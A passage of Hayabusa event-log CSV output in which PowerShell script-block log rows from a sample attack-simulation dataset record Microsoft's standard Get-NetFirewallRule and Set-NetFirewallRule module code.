[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.Conta",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"insKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletizatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 